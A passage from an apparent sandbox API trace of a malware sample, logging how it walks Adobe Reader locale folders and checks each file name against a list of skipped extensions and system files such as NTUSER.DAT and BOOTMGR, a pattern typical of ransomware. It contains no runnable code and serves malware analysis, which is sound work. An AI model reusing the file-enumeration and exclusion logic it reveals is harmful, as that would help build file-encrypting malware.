ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d853f20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.396] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x833608a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.399] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f24da0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.400] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.400] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.400] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832ee480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832ee480, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.403] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f971c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fe3480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fe3480, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.404] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.404] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.404] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d723420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82fce7a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.415] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f971c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fe3480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fe3480, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.415] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.415] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.416] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d723420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82f5c380, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82f5c380, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.418] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fe3480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fe3480, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.419] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.420] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.420] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d63ebe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ec3e00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.422] CharUpperBuffW (in: lpsz=".ESP", cchLength=0x4 | out: lpsz=".ESP") returned 0x4 [0058.422] CharUpperBuffW (in: lpsz="ReadOutLoud.ESP", cchLength=0xf | out: lpsz="READOUTLOUD.ESP") returned 0xf [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ESP", cchCount2=3) returned 1 [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ESP", cchCount2=3) returned 3 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ESP", cchCount2=3) returned 3 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ESP", cchCount2=3) returned 3 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 3 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 1 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 3 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="READOUTLOUD.ESP", cchCount2=15) returned 3 [0058.424] CharUpperBuffW (in: lpsz=".ESP", cchLength=0x4 | out: lpsz=".ESP") returned 0x4 [0058.424] CharUpperBuffW (in: lpsz="reflow.ESP", cchLength=0xa | out: lpsz="REFLOW.ESP") returned 0xa [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ESP", cchCount2=3) returned 1 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ESP", cchCount2=3) returned 3 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ESP", cchCount2=3) returned 3 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ESP", cchCount2=3) returned 3 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="REFLOW.ESP", cchCount2=10) returned 3 [0058.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="REFLOW.ESP", cchCount2=10) returned 1 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="REFLOW.ESP", cchCount2=10) returned 3 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="REFLOW.ESP", cchCount2=10) returned 3 [0058.426] CharUpperBuffW (in: lpsz=".ESP", cchLength=0x4 | out: lpsz=".ESP") returned 0x4 [0058.426] CharUpperBuffW (in: lpsz="SaveAsRTF.ESP", cchLength=0xd | out: lpsz="SAVEASRTF.ESP") returned 0xd [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ESP", cchCount2=3) returned 1 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 3 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 1 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 3 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="SAVEASRTF.ESP", cchCount2=13) returned 3 [0058.428] CharUpperBuffW (in: lpsz=".ESP", cchLength=0x4 | out: lpsz=".ESP") returned 0x4 [0058.428] CharUpperBuffW (in: lpsz="Search.ESP", cchLength=0xa | out: lpsz="SEARCH.ESP") returned 0xa [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ESP", cchCount2=3) returned 1 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="ESP", cchCount2=3) returned 3 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="SEARCH.ESP", cchCount2=10) returned 3 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="SEARCH.ESP", cchCount2=10) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="SEARCH.ESP", cchCount2=10) returned 3 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="SEARCH.ESP", cchCount2=10) returned 3 [0058.430] CharUpperBuffW (in: lpsz=".ESP", cchLength=0x4 | out: lpsz=".ESP") returned 0x4 [0058.430] CharUpperBuffW (in: lpsz="SendMail.ESP", cchLength=0xc | out: lpsz="SENDMAIL.ESP") returned 0xc [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="ESP", cchCount2=3) returned 1 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ESP", cchCount2=3) returned 3 [0058.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="ESP", cchCount2=3) returned 1 [0058.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ESP", 